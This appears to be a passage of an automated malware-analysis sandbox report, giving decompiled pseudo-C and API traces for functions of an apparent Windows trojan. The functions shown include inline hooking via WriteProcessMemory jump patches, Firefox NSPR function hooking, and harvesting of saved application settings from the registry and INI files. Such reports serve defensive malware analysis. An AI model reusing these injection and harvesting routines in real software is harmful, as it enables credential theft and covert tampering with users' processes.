				} else {
					_t3 = _t257 + 0x10; // 0x10f
					_t286 = _t3;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E004165E8(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E0040FA33(_t188,  &_v996);
											_push(_v1052);
											E0040592A(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E004163A8(_t255);
										}
									} else {
										_t280 = 0x3c;
										E0041645B( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E0040FA33(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E0041709B( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E00405780(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E004163A8(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x423124);
										E004163A8( *0x42313c);
										_t168 = E00416806(E004163A8( *0x423140) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x42313c = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423140 = E00416806(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x423124);
										goto L51;
									}
									E0040F16A( &_v860, _t259, 1,  &_v996);
									if(E0041764D( &_v900,  *((intOrPtr*)(_t286 - 4)), E00416EE5( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E00416710( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E0041A627(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E00414134(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E00416333(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E004163E4(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E004163E4(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E0041AFD0(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E00416378( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E004163E4(E004163E4(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E004163E4(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E004163A8( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E00414134(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E00416EE5(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(E0041732C( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x00414e0e
0x00414e14
0x00414e1a
0x00414e24
0x004152af
0x004152b6
0x004152bf
0x00414e2a
0x00414e2a
0x00414e2a
0x00414e2d
0x00414e31
0x00414e35
0x00414e38
0x00414e3d
0x00414e40
0x00414e46
0x00414e88
0x00414e8b
0x00414e8b
0x00414e91
0x00414e96
0x00414e9b
0x00414e9d
0x00414ea3
0x004150a5
0x004150a5
0x004150a8
0x004150ac
0x004150c1
0x00415186
0x00415188
0x0041518a
0x00415192
0x00415193
0x00415198
0x004151a8
0x004151ad
0x004151b1
0x004151b1
0x004150c7
0x004150c9
0x004150d1
0x004150dd
0x004150eb
0x004150ef
0x00415100
0x00415115
0x0041511d
0x00415124
0x00415125
0x0041512f
0x00415135
0x00415140
0x00415148
0x00415158
0x0041515d
0x0041516f
0x00415174
0x00415174
0x00415100
0x004151ba
0x004151bf
0x004151bf
0x004151c4
0x004151ce
0x0041525b
0x00415267
0x0041527d
0x00415282
0x0041528a
0x00415293
0x00415298
0x00000000
0x00415298
0x004151e2
0x00415200
0x00000000
0x00000000
0x00415206
0x0041520d
0x00415214
0x00415219
0x0041521a
0x0041521d
0x00415224
0x0041522f
0x0041524e
0x0041524e
0x00000000
0x00414ea9
0x00414ea9
0x00414f0e
0x00414f0e
0x00414f14
0x00414f47
0x00414f4e
0x00414f53
0x00414f55
0x00415093
0x0041509b
0x00414eab
0x00414eaf
0x00414eb2
0x00414eb7
0x00414ebe
0x00414ec2
0x00414ec5
0x00414ec9
0x00414ecd
0x00414ed4
0x00000000
0x00414ed6
0x00414ed6
0x00000000
0x00414ed6
0x00414ed4
0x004150a1
0x00000000
0x004150a1
0x00414f5f
0x00414f63
0x00414f67
0x00414f77
0x00414f77
0x00414f77
0x00414f69
0x00414f6d
0x00414f6d
0x00414f7b
0x00414f86
0x00414f8a
0x00414f8d
0x00414f90
0x00414f96
0x00415008
0x0041500a
0x0041501e
0x00415023
0x00415025
0x00415027
0x0041502b
0x0041502d
0x0041503f
0x00415044
0x00415044
0x00415044
0x00415044
0x0041504a
0x0041505b
0x00415060
0x00415064
0x0041506b
0x00415076
0x0041507b
0x0041507b
0x0041507b
0x0041507f
0x0041506d
0x0041506d
0x0041506d
0x00415082
0x00415086
0x0041508a
0x0041508a
0x0041508b
0x0041508f
0x0041508f
0x00415025
0x00414f98
0x00414fa1
0x00414fa5
0x00414faa
0x00414fb0
0x00414fb6
0x00414fcc
0x00414fd1
0x00414fdf
0x00414fe7
0x00414fee
0x00414ff7
0x00414ffb
0x00415001
0x00415001
0x00414fb0
0x00000000
0x00414f96
0x00414f19
0x00414f22
0x00414f1b
0x00414f1e
0x00414f1e
0x00414f26
0x00000000
0x00414edd
0x00414ef5
0x00414efa
0x00414efc
0x00000000
0x00000000
0x00414f02
0x00414f06
0x00414f0a
0x00000000
0x00414f0a
0x00414ea3
0x00414e48
0x00414e4f
0x00414e53
0x00414e58
0x00414e5b
0x00414e61
0x00414e6a
0x00414e71
0x00414e75
0x00414e80
0x00000000
0x00414e86
0x0041529e
0x0041529e
0x004152a1
0x004152a1
0x004152a5
0x004152a5
0x00000000
0x00414e35

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 004150F7
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00415115
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,00000000,?,-004228D8), ref: 0041522F
EnterCriticalSection.KERNEL32(00423124,00000000,?,-004228D8), ref: 0041525B
LeaveCriticalSection.KERNEL32(00423124,?,?), ref: 00415298

Strings

?*, xrefs: 00414E48
$1B, xrefs: 00415255

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: $1B$?*
API String ID: 2400141425-1015212757
Opcode ID: 71f75da2dc94852a1a4c63d037ec047f91e1730c7b72769445668c59c5b612ac
Instruction ID: 7f34755af472100854ae3490d22aae4afe427d4928ed40890bd0859547b591fb
Opcode Fuzzy Hash: 71f75da2dc94852a1a4c63d037ec047f91e1730c7b72769445668c59c5b612ac
Instruction Fuzzy Hash: 29E177716083019FD710DF69C880AABB7E5FFC8318F04492EF995A7251D738E985CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1FE, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040B1FE(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E0041645B( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E0040FA33(_t46,  &_v252);
				_t48 = 0x6b;
				E0040FA33(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E0041A4CC(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E0040B012(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E0040FA33(_t57,  &_v64);
					_t59 = 0x6e;
					E0040FA33(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E0040FA33(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E0040AFD0(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E0041BAD3( &_v772,  &_v24, 0, 3, 2, E0040B1B5,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E004163A8(_v12);
						}
						_push(0xcb);
						return E004099E1(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E0040FA33(_t68,  &_v180);
					_t70 = 0x6c;
					E0040FA33(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E0041A4CC(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E0040AFD0(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x0040b1fe
0x0040b1fe
0x0040b212
0x0040b21f
0x0040b220
0x0040b22a
0x0040b22b
0x0040b240
0x0040b24b
0x0040b253
0x0040b255
0x0040b257
0x0040b264
0x0040b275
0x0040b281
0x0040b281
0x0040b257
0x0040b287
0x0040b28c
0x0040b3ac
0x0040b3ac
0x00000000
0x0040b292
0x0040b297
0x0040b298
0x0040b2a5
0x0040b2a6
0x0040b2ad
0x0040b2b0
0x0040b2b1
0x0040b2b9
0x0040b2c2
0x0040b2c7
0x0040b2ce
0x0040b2d5
0x0040b2dc
0x0040b2e3
0x0040b2e6
0x0040b2e6
0x0040b2f7
0x0040b2ff
0x0040b301
0x0040b304
0x0040b312
0x0040b319
0x0040b319
0x0040b332
0x0040b335
0x0040b33b
0x0040b33b
0x0040b340
0x0040b341
0x0040b34a
0x0040b3b0
0x0040b3b0
0x00000000
0x0040b3c7
0x0040b3b5
0x00000000
0x0040b3bd
0x0040b354
0x0040b355
0x0040b35f
0x0040b360
0x0040b370
0x0040b37b
0x0040b383
0x0040b385
0x0040b387
0x0040b394
0x0040b3a7
0x0040b3a7
0x0040b387
0x00000000
0x0040b383

APIs

Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040B264

Part of subcall function 0040B012: GetPrivateProfileStringW.KERNEL32 ref: 0040B049
Part of subcall function 0040B012: StrStrIW.SHLWAPI(?,?), ref: 0040B0D1
Part of subcall function 0040B012: StrStrIW.SHLWAPI(?,?), ref: 0040B0E2
Part of subcall function 0040B012: GetPrivateProfileStringW.KERNEL32 ref: 0040B0FE
Part of subcall function 0040B012: GetPrivateProfileStringW.KERNEL32 ref: 0040B11C

PathRemoveFileSpecW.SHLWAPI(?), ref: 0040B281

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040B2F7
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0040B394

Strings

&, xrefs: 0040B2D5
$, xrefs: 0040B2C7
#, xrefs: 0040B2DC

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: a96cba2b15fc9284fb6d7b5c8e441db219eaa6cc77a70741e7d617f0b3b8792f
Instruction ID: f2b1e163377e4992b5c0651f544e42c013a560d9533b293701ea2a4c068c3350
Opcode Fuzzy Hash: a96cba2b15fc9284fb6d7b5c8e441db219eaa6cc77a70741e7d617f0b3b8792f
Instruction Fuzzy Hash: 37511D72E00219AADF21EAA1DC49FDFB7BCEB04314F1005B7B508F7181D7789A858B99

Uniqueness

Uniqueness Score: -1.00%

Function 0041ABE4, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041ABE4(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
				char _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t48;
				void* _t59;
				intOrPtr _t62;
				void* _t64;
				intOrPtr* _t67;
				long _t69;
				DWORD* _t70;
				void* _t72;

				_t64 = __edx;
				_t62 = __ecx;
				_t59 = __eax;
				_t70 = 0;
				_v12 = 0;
				if(E0041AB9F(_a4) < 0x1e) {
					L18:
					return _v12;
				}
				_t3 =  &_v8; // 0x40e974
				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
					goto L18;
				}
				E0041645B( &_v48,  &_v48, 0xffffff90, 0x23);
				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
					L17:
					_t31 =  &_v8; // 0x40e974
					_t32 =  &_v8; // 0x40e974
					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t32, _t31);
					goto L18;
				} else {
					_t67 =  &_v48;
					_push(0);
					_push(_t67);
					while(1) {
						_t48 = E0041D900(_t59, _t62, _t64, _t67, _t70);
						if(_t48 == 0xffffffff) {
							break;
						}
						_t70 = _t70 + _t48;
						if(_t70 > 0x1e) {
							L16:
							goto L17;
						}
						_t62 =  *_t67;
						if(_t62 == 0xe9 || _t62 == 0xe8) {
							if(_t48 == 5) {
								_t10 =  &_a8; // 0x422020
								 *((intOrPtr*)(_t67 + 1)) =  *((intOrPtr*)(_t67 + 1)) + _a4 -  *_t10;
							}
						}
						_push(0);
						if(_t70 >= 5) {
							_t16 =  &_a8; // 0x422020
							_t17 = _t70 + 5; // 0x5
							_t69 = _t17;
							 *((intOrPtr*)(_t72 + _t70 - 0x2b)) = _a4 -  *_t16 - 5;
							_t21 =  &_a8; // 0x422020
							 *((char*)(_t72 + _t70 - 0x2c)) = 0xe9;
							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t69, ??) != 0) {
								_v48 = 0xe9;
								_v47 = _t59 - _a4 - 5;
								E0041568B(_a4, _a8);
								if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
									_v12 = _t69;
								}
							}
							goto L16;
						}
						_t67 = _t72 + _t70 - 0x2c;
						_push(_t67);
					}
					goto L16;
				}
			}

0x0041abe4
0x0041abe4
0x0041abec
0x0041abf1
0x0041abf3
0x0041abfe
0x0041acfa
0x0041ad00
0x0041ad00
0x0041ac04
0x0041ac19
0x00000000
0x00000000
0x0041ac27
0x0041ac40
0x0041ace6
0x0041ace6
0x0041acea
0x0041acf4
0x00000000
0x0041ac46
0x0041ac47
0x0041ac4a
0x0041ac4d
0x0041ac81
0x0041ac81
0x0041ac89
0x00000000
0x00000000
0x0041ac50
0x0041ac55
0x0041ace5
0x00000000
0x0041ace5
0x0041ac5b
0x0041ac60
0x0041ac6a
0x0041ac6f
0x0041ac72
0x0041ac72
0x0041ac6a
0x0041ac75
0x0041ac7a
0x0041ac90
0x0041ac93
0x0041ac93
0x0041ac99
0x0041aca2
0x0041aca5
0x0041acb6
0x0041acc3
0x0041acc7
0x0041acca
0x0041ace0
0x0041ace2
0x0041ace2
0x0041ace0
0x00000000
0x0041acb6
0x0041ac7c
0x0041ac80
0x0041ac80
0x00000000
0x0041ac8b

APIs

Part of subcall function 0041AB9F: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0041562B,00000000,00000000,00000034,004159B6,00422020,00000000), ref: 0041ABB4

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,t@,-00000008,00000034,?,?,0041574C,?,00000000,?,?,004159B6,00422020), ref: 0041AC11
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0041574C,?,00000000,?,?,004159B6), ref: 0041AC38
WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,0041574C,?,00000000,?,?,004159B6), ref: 0041ACB2
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,0041574C,?,00000000,?,?,004159B6,00422020,00000000,0040E974), ref: 0041ACDC
VirtualProtectEx.KERNEL32(000000FF,?,0000001E,t@,t@,?,?,0041574C,?,00000000,?,?,004159B6,00422020,00000000,0040E974), ref: 0041ACF4

Strings

B, xrefs: 0041AC90, 0041ACA2, 0041AC6F
t@, xrefs: 0041AC04, 0041ACE6, 0041ACEA, 0041AC07, 0041ACE9

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID: B$t@
API String ID: 390532180-3118262274
Opcode ID: 3e6bba40491de74e9769631c182a4a7d2de31922bd843b98d0fd6a834c51b6bd
Instruction ID: cc693e854351c75c522ebbc96656baf05a20c231da4a7ec70e99dea665d51bf5
Opcode Fuzzy Hash: 3e6bba40491de74e9769631c182a4a7d2de31922bd843b98d0fd6a834c51b6bd
Instruction Fuzzy Hash: 09316272900208AFDF109FB8CD44EDE7B69AB09370F108316F925A61D0D634D5908BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412B09, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412B09(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t14;

				 *0x423098 =  *0x423098 & 0x00000000;
				 *0x42309c =  *0x42309c & 0x00000000;
				_t14 = __eax;
				InitializeCriticalSection(0x42307c);
				 *0x423094 = _a4;
				 *0x423070 = _a8;
				 *0x4230a0 = _a12;
				 *0x423074 = _t14;
				 *0x42306c = _a16;
				 *0x423068 = GetProcAddress(_t14, "PR_GetNameForIdentity");
				 *0x423078 = GetProcAddress( *0x423074, "PR_SetError");
				_t12 = GetProcAddress( *0x423074, "PR_GetError");
				 *0x423064 = _t12;
				return _t12;
			}

0x00412b09
0x00412b10
0x00412b1d
0x00412b1f
0x00412b29
0x00412b32
0x00412b40
0x00412b49
0x00412b56
0x00412b68
0x00412b7a
0x00412b7f
0x00412b81
0x00412b87

APIs

InitializeCriticalSection.KERNEL32(0042307C,74B04EE0,00415A26,00422360), ref: 00412B1F
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00412B5B
GetProcAddress.KERNEL32(PR_SetError), ref: 00412B6D
GetProcAddress.KERNEL32(PR_GetError), ref: 00412B7F

Strings

PR_SetError, xrefs: 00412B5D
PR_GetError, xrefs: 00412B6F
PR_GetNameForIdentity, xrefs: 00412B3B

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$CriticalInitializeSection
String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
API String ID: 2804437462-2578621715
Opcode ID: 4bee4486cb426aa557b90688aa627cb1b9d2ffe426d5e80124e30cbda71cb939
Instruction ID: 31a6dd2cad711d4407113bc64ac16d520dd87ac287238e740d4950e58f1274ec
Opcode Fuzzy Hash: 4bee4486cb426aa557b90688aa627cb1b9d2ffe426d5e80124e30cbda71cb939
Instruction Fuzzy Hash: 6D0196B4B05310AFD720DF78ED49A057FF0A748762B90497AA648A3268D37C9546CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D90B, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040D90B(void* __edx, intOrPtr* _a4) {
				char _v524;
				char _v544;
				char _v556;
				intOrPtr _v572;
				char _v924;
				char _v1028;
				char _v1040;
				char _v1060;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1120;
				char* _v1124;
				intOrPtr _v1128;
				char _v1132;
				intOrPtr _v1144;
				signed short _v1146;
				char _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1157;
				signed int _v1160;
				void* _v1164;
				void* _v1168;
				char _v1177;
				char _v1180;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t59;
				void* _t62;
				signed int _t71;
				char _t77;
				char* _t85;
				char _t88;
				char _t95;
				short _t100;
				intOrPtr* _t105;
				void* _t111;
				char _t112;
				signed int _t118;
				signed int _t119;
				void* _t123;

				_t111 = __edx;
				_t105 = _a4;
				_t59 =  *(_t105 + 4);
				_push(_t118);
				_t119 = _t118 | 0xffffffff;
				_v1152 = _t119;
				_v1156 = _t119;
				if(_t59 == _t119 || _t59 == 0xfffffffe) {
					L4:
					_t62 = E00416A27( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
					_t109 =  *_t105;
					_t63 = E00419431(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
					_v1160 = _t63;
					_t133 = _t63 - _t119;
					if(_t63 == _t119) {
						goto L20;
					}
					E004197A3(_t109, _t63);
					E00419761(_v1160);
					_push(_t105 + 8);
					_push(3);
					_push(_v1164);
					_t123 = 4;
					if(E0041CA42(_t109, _t123, _t133) == 0) {
						goto L20;
					}
					_t71 =  *(_t105 + 4);
					if(_t71 == 0xfffffffe) {
						SetThreadPriority(GetCurrentThread(), 1);
						E0040ED80(0x2937498d,  &_v1028, 0);
						_t63 = E00404C67(_t109, __eflags,  &_v1040);
						__eflags = _t63;
						if(_t63 == 0) {
							goto L20;
						}
						_t77 = E00407CD9(_t109, _t111,  &_v924, 1);
						__eflags = _t77;
						if(_t77 == 0) {
							L19:
							_t63 = E00407F44( &_v924, 1);
							goto L20;
						} else {
							__imp__GetShellWindow();
							__eflags = _t77;
							_v1157 = _t77 != 0;
							__eflags = _v1157;
							if(_v1157 == 0) {
								E0040FA33(0xa8,  &_v1132);
								_t85 =  &_v524;
								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
								__eflags = _t85;
								if(_t85 == 0) {
									_t88 = E0041BC2F( &_v1132,  &_v544,  &_v544);
									__eflags = _t88;
									if(_t88 != 0) {
										_t112 = 0x44;
										E0041645B( &_v1120,  &_v1120, 0, _t112);
										_v1124 =  &_v1060;
										_v1132 = _t112;
										_t95 = E00417C6F( &_v556, 0, 0,  &_v1132,  &_v1180);
										__eflags = _t95;
										if(_t95 != 0) {
											WaitForSingleObject(_v1168, 0x1388);
											CloseHandle(_v1164);
											CloseHandle(_v1168);
											_v1177 = 1;
										}
									}
								}
							}
							SystemParametersInfoW(0x1003, 0, 0, 0);
							__eflags = _v1157 - 1;
							if(__eflags == 0) {
								_v1132 =  &_v924;
								_v1128 = 0x408153;
								_v1124 = 0x408156;
								_v1120 = E00408159;
								_v1116 = E0040817D;
								_v1112 = E004081C4;
								_v1108 = E004081F9;
								_v1104 = 0x408153;
								E00410F8B(__eflags, _v1156,  &_v1132, _v924, _v572);
							}
							goto L19;
						}
					} else {
